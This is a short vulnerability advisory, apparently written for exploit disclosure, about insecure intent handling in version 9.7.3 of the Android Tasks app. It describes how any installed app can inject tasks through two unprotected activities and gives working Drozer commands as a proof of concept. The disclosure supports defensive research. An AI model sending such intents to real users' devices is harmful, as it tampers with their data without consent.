# Date: 18th of July, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
# Vendor Homepage: https://tasks.org/
# Software Link: https://github.com/tasks/tasks
# Version: 9.7.3
# Tested on: Android 9
Any installed application on a victim's phone can add arbitrary
tasks to users through insecure IPC handling.
A malicious application has several ways of how to achieve
that:
1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list.
2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.
We used the Drozer application to emulate malicious app activity. Please find the commands below.
run app.activity.start --component org.tasks.debug
com.todoroo.astrid.activity.ShareLinkActivity
--action=android.intent.action.PROCESS_TEXT --extra string
android.intent.extra.PROCESS_TEXT "Kill Mufasa"
run app.activity.start --component org.tasks.debug
org.tasks.voice.VoiceCommandActivity
--action=com.google.android.gm.action.AUTO_SEND --extra string
android.intent.extra.TEXT "Visit https://lyhinslab.org"
